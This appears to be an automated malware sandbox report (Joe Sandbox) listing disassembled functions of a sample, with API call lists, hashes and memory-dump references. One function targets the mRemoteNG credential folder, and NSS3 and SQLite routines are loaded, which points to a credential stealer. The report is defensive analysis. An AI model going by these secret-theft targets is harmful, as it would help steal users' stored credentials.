Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4

DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 6BC71BF0 Relevance: 9.1, APIs: 6, Instructions: 94threadmemoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BC71C0C

Part of subcall function 6BD1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BD1C2BF

PORT_NewArena_Util.NSS3(00000800), ref: 6BC71C20
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6BC71C37
PR_GetCurrentThread.NSS3 ref: 6BC71C76
PR_GetCurrentThread.NSS3 ref: 6BC71CB1
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BC71CDE

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Arena_CurrentThread$Alloc_ArenaErrorFreeValue
String ID:
API String ID: 2304596573-0
Opcode ID: 9d5640a65a64047ac5af3fb7567be9bca082c7a784147850f5c80293ece743cb
Instruction ID: 12e3f6b1a9ce651905132aa64bf281d718d1b7c8bbffdb1ab47e9507d9343400
Opcode Fuzzy Hash: 9d5640a65a64047ac5af3fb7567be9bca082c7a784147850f5c80293ece743cb
Instruction Fuzzy Hash: AD21F5B2D20225ABEB20AFFA9D46E6B3B68EF14254F040174FD4496252F739D750C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6BD88A50 Relevance: 9.1, APIs: 6, Instructions: 84networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6BD88A8F

Part of subcall function 6BC60F00: PR_GetPageSize.NSS3(6BC60936,FFFFE8AE,?,6BBF16B7,00000000,?,6BC60936,00000000,?,6BBF204A), ref: 6BC60F1B
Part of subcall function 6BC60F00: PR_NewLogModule.NSS3(clock,6BC60936,FFFFE8AE,?,6BBF16B7,00000000,?,6BC60936,00000000,?,6BBF204A), ref: 6BC60F25

htons.WSOCK32(?), ref: 6BD88ACB
PR_GetCurrentThread.NSS3(?), ref: 6BD88AE2
htons.WSOCK32(?), ref: 6BD88B1E
htonl.WSOCK32(7F000001,?), ref: 6BD88B3B

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: htons$CurrentModulePageSizeThreadhtonl
String ID:
API String ID: 3860140138-0
Opcode ID: fd355d01e1aeeb07d80372f18595821a724632ce81a60a24b719b041152435b6
Instruction ID: 5e54927b462af1560058f11831c342f7ea7f6aad3ed00e5dc2a7c7fe1ba6290d
Opcode Fuzzy Hash: fd355d01e1aeeb07d80372f18595821a724632ce81a60a24b719b041152435b6
Instruction Fuzzy Hash: CB21DDB0C24751DAD3208F398982937B3F5AF95726B11DA1EE8D99B120F739A5C0D364

Uniqueness

Uniqueness Score: -1.00%

Function 6BCD0AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,?,6BC87F62,00000000,00000000,?,?,?,6BC880DD), ref: 6BCD0AAE
PL_HashTableDestroy.NSS3(?,?,?,6BC87F62,00000000,00000000,?,?,?,6BC880DD), ref: 6BCD0ACA
PL_HashTableDestroy.NSS3(?,?,?,6BC87F62,00000000,00000000,?,?,?,6BC880DD), ref: 6BCD0B05
PORT_FreeArena_Util.NSS3(?,00000000,?,?,6BC87F62,00000000,00000000,?,?,?,6BC880DD), ref: 6BCD0B24
free.MOZGLUE(?,?,?,6BC87F62,00000000,00000000,?,?,?,6BC880DD), ref: 6BCD0B3C
memset.VCRUNTIME140(6BDD24E4,00000000,000005B0,?,?,6BC87F62,00000000,00000000,?,?,?,6BC880DD), ref: 6BCD0BC2

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: DestroyHashTable$Arena_FreeUtilfreememset
String ID:
API String ID: 4033302747-0
Opcode ID: e98112026254ebd6510dc0ec193bec8c2ef795eef13ca6608f557b58591e341f
Instruction ID: bc39eb6c94baddd93fb0fa78c3928df512916432af0caae1604cfced09c0927c
Opcode Fuzzy Hash: e98112026254ebd6510dc0ec193bec8c2ef795eef13ca6608f557b58591e341f
Instruction Fuzzy Hash: 95212EF4A112429FFF50CF7ADC06B02BBA8A7A635CF001125D989DB641F739D244CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6BD09B50 Relevance: 9.1, APIs: 6, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3 ref: 6BD09B73

Part of subcall function 6BCD0D30: calloc.MOZGLUE ref: 6BCD0D50
Part of subcall function 6BCD0D30: TlsGetValue.KERNEL32 ref: 6BCD0D6D

PORT_ZAlloc_Util.NSS3 ref: 6BD09B96
TlsGetValue.KERNEL32(6BCF847D,?), ref: 6BD09BC2
SECKEY_DestroyPrivateKey.NSS3 ref: 6BD09BF3
SECKEY_DestroyPublicKey.NSS3 ref: 6BD09BFE
free.MOZGLUE ref: 6BD09C06

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Alloc_DestroyUtilValue$PrivatePubliccallocfree
String ID:
API String ID: 534788125-0
Opcode ID: 2955d895be11c2916fd4c21401dfdf57614dcc4154712d5d920622e308b49e81
Instruction ID: 047057645d74e80379c1c05f5ffbdbf7feb2cdfa2a1b956a53beabf251ebb7e2
Opcode Fuzzy Hash: 2955d895be11c2916fd4c21401dfdf57614dcc4154712d5d920622e308b49e81
Instruction Fuzzy Hash: 35213AB0918605CFE700AF3DC485769BBE4FF05764F0189AAD8988F292EB7CD490CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC88A90 Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 6BC88FE0: PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6BC90710), ref: 6BC88FF1
Part of subcall function 6BC88FE0: calloc.MOZGLUE(00000001,00000000,?,?,6BC90710), ref: 6BC8904D
Part of subcall function 6BC88FE0: memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6BC90710), ref: 6BC89066
Part of subcall function 6BC88FE0: PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6BC90710), ref: 6BC89078

TlsGetValue.KERNEL32 ref: 6BC88AC1
EnterCriticalSection.KERNEL32 ref: 6BC88AD6
PL_FinishArenaPool.NSS3 ref: 6BC88AE5
PR_Unlock.NSS3 ref: 6BC88AF7
DeleteCriticalSection.KERNEL32 ref: 6BC88B02
free.MOZGLUE ref: 6BC88B0E

Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607AD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607CD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607D6
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BBF204A), ref: 6BC607E4
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,6BBF204A), ref: 6BC60864
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BC60880
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,6BBF204A), ref: 6BC608CB
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608D7
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608FB

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$calloc$CriticalPrivateSectionThread$ArenaDeleteEnterFinishPoolUnlockfreememcpy
String ID:
API String ID: 417085867-0
Opcode ID: 38be7eac1b52c414e956e951a8c7377f85e4a26b920bf66a0aef7cbd27572fed
Instruction ID: a689c3257948d6d5dd445d7c5a5bc6d1a105b56aa4ecd6e5b4b1e57712495888
Opcode Fuzzy Hash: 38be7eac1b52c414e956e951a8c7377f85e4a26b920bf66a0aef7cbd27572fed
Instruction Fuzzy Hash: 8E114CB15146058BEB00AF74C48AA6ABBF8FF41348F054969D9858B601FB38D695CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6BD03BD0 Relevance: 9.1, APIs: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6BD05B40: PR_GetIdentitiesLayer.NSS3 ref: 6BD05B56

PR_EnterMonitor.NSS3(?), ref: 6BD03BF9

Part of subcall function 6BD39090: TlsGetValue.KERNEL32 ref: 6BD390AB
Part of subcall function 6BD39090: TlsGetValue.KERNEL32 ref: 6BD390C9
Part of subcall function 6BD39090: EnterCriticalSection.KERNEL32 ref: 6BD390E5
Part of subcall function 6BD39090: TlsGetValue.KERNEL32 ref: 6BD39116
Part of subcall function 6BD39090: LeaveCriticalSection.KERNEL32 ref: 6BD3913F

PR_EnterMonitor.NSS3(?), ref: 6BD03C10
free.MOZGLUE(?), ref: 6BD03C26
PORT_Strdup_Util.NSS3(?), ref: 6BD03C30
PR_ExitMonitor.NSS3(?), ref: 6BD03C52
PR_ExitMonitor.NSS3(?), ref: 6BD03C69

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Monitor$EnterValue$CriticalExitSection$IdentitiesLayerLeaveStrdup_Utilfree
String ID:
API String ID: 980993467-0
Opcode ID: 9e46ab15b8d756798263e0e7ebfefed89942b2656cc2c2dfeb058436660f8424
Instruction ID: bcd560f9919d70d927b1c7834e6f486176100c60e9fc0abcfe153247a17c3fa3
Opcode Fuzzy Hash: 9e46ab15b8d756798263e0e7ebfefed89942b2656cc2c2dfeb058436660f8424
Instruction Fuzzy Hash: 3F01A5B96106105BE7705F39EC02E8BB7B5DB46238F044835E85ECA122EA3EF515C69A

Uniqueness

Uniqueness Score: -1.00%

Function 6BC88B50 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6BC90948,00000000), ref: 6BC88B6B
EnterCriticalSection.KERNEL32(?,?,?,6BC90948,00000000), ref: 6BC88B80
PL_FinishArenaPool.NSS3(?,?,?,?,6BC90948,00000000), ref: 6BC88B8F
PR_Unlock.NSS3(?,?,?,?,6BC90948,00000000), ref: 6BC88BA1
DeleteCriticalSection.KERNEL32(?,?,?,?,6BC90948,00000000), ref: 6BC88BAC
free.MOZGLUE(?,?,?,?,?,6BC90948,00000000), ref: 6BC88BB8

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
String ID:
API String ID: 1456478736-0
Opcode ID: e44354b1b7c356d82979520bc923cf3ebb79e097873f5fd6b1df52433b79f807
Instruction ID: 46720cfe2710d2a2bf9ef2c5d5683c9022f1bdb3190cf37d51d63a1ad7d2bec7
Opcode Fuzzy Hash: e44354b1b7c356d82979520bc923cf3ebb79e097873f5fd6b1df52433b79f807
Instruction Fuzzy Hash: DE119EB1414A058FEB00BFB8C48953AFBF8FF45318F054969D9858B200EB38E596CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC8AB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(D958E852,6BC91397,5B5F5EC0,?,?,6BC8B1EE,2404110F,?,?), ref: 6BC8AB3C
free.MOZGLUE(D958E836,?,6BC8B1EE,2404110F,?,?), ref: 6BC8AB49
DeleteCriticalSection.KERNEL32(5D5E6BE8), ref: 6BC8AB5C
free.MOZGLUE(5D5E6BDC), ref: 6BC8AB63
DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6BC8AB6F
free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6BC8AB76

Part of subcall function 6BCBF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6BCBF854
Part of subcall function 6BCBF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6BCBF868
Part of subcall function 6BCBF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6BCBF882
Part of subcall function 6BCBF820: free.MOZGLUE(04C483FF,?,?), ref: 6BCBF889
Part of subcall function 6BCBF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6BCBF8A4
Part of subcall function 6BCBF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6BCBF8AB
Part of subcall function 6BCBF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6BCBF8C9
Part of subcall function 6BCBF820: free.MOZGLUE(280F10EC,?,?), ref: 6BCBF8D0

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 092cae1ce09a6b57b08eaddddad3043ae4fa4fa05422f01ed47b479d07ec6996
Instruction ID: 08b1c38ad35517e2c005da265ce5a6920e0286daf0a28bd01c4c3350500624bc
Opcode Fuzzy Hash: 092cae1ce09a6b57b08eaddddad3043ae4fa4fa05422f01ed47b479d07ec6996
Instruction Fuzzy Hash: 3B01F1B2800606AFDA119FB4DC84C5BB77DFE817383080525EA0983650E33BF556CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00415960 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(02F55518,?,?,?,0040F76C,?,02F55518,00000000), ref: 0041596C
lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,02F55518,02F55518,?,0040F76C,?,02F55518), ref: 00415990
lstrlen.KERNEL32(?,?,0040F76C,?,02F55518), ref: 004159A7
wsprintfA.USER32 ref: 004159C7

Strings

C:\Users\user\AppData\Roaming\mRemoteNG\, xrefs: 0041598B, 004159C0, 004159D0
%s%s, xrefs: 004159B5

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
API String ID: 1206339513-1027354905
Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6BC17AF0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(6BC168C4,?,?,?,?,?,?,?,6BC168C4,?,?,00000000,?,?), ref: 6BC17BAE

Strings

%s at line %d of [%.10s], xrefs: 6BC17C22
database corruption, xrefs: 6BC17C1D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BC17C13

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: memcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 3510742995-598938438
Opcode ID: 413157c61f0c35a0a9353eb78fbe91d4a88fdda660a417f34f6a034722b9086c
Instruction ID: 78ce54d6912421a6682b7593a40a58d82fde753ec1534a6b35b11673ec3aeec3
Opcode Fuzzy Hash: 413157c61f0c35a0a9353eb78fbe91d4a88fdda660a417f34f6a034722b9086c
Instruction Fuzzy Hash: 60416FB5E142198FCB14CFA9C88199EB7F1FF49710F11846AE845B7340E338AE45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBFDB40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?), ref: 6BBFDBB8
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011D39,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?), ref: 6BBFDC3D

Strings

%s at line %d of [%.10s], xrefs: 6BBFDC37
database corruption, xrefs: 6BBFDC32
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BBFDC28

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: memcpysqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 3892320796-598938438
Opcode ID: 765fc0aa533a2535cb6349b201a89570819c04cee7326bed52caa1e3ee2b7278
Instruction ID: fe224d3a40193e92170345adecf62d60d2d50f62716c4271aa808829b5e37d4c
Opcode Fuzzy Hash: 765fc0aa533a2535cb6349b201a89570819c04cee7326bed52caa1e3ee2b7278
Instruction Fuzzy Hash: 7431C7786052949FC320CF28D940A7EBBF5BF49314B04869DE8999B743D239E906CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 6BC84B00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BC84B66
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BC84B7D
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6BC84B97
PORT_ZAlloc_Util.NSS3(00000018), ref: 6BC84BB7

Part of subcall function 6BCD0D30: calloc.MOZGLUE ref: 6BCD0D50
Part of subcall function 6BCD0D30: TlsGetValue.KERNEL32 ref: 6BCD0D6D

Strings

, xrefs: 6BC84B8A

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
String ID:
API String ID: 4087055539-3916222277
Opcode ID: 0f9d79571e8ba74c92080924390e0fe9144d29fc5ca19e1aafd066982c64aaf9
Instruction ID: 911a61a4e056910f1f29729030d0e3a311fb7b38ef0e481f3b0c26901b003ae4
Opcode Fuzzy Hash: 0f9d79571e8ba74c92080924390e0fe9144d29fc5ca19e1aafd066982c64aaf9
Instruction Fuzzy Hash: E72108B1D1064A5BDF10CB699C42BBFFFB8AF8131CF100165E9299A1E1F724A714C6A2

Uniqueness

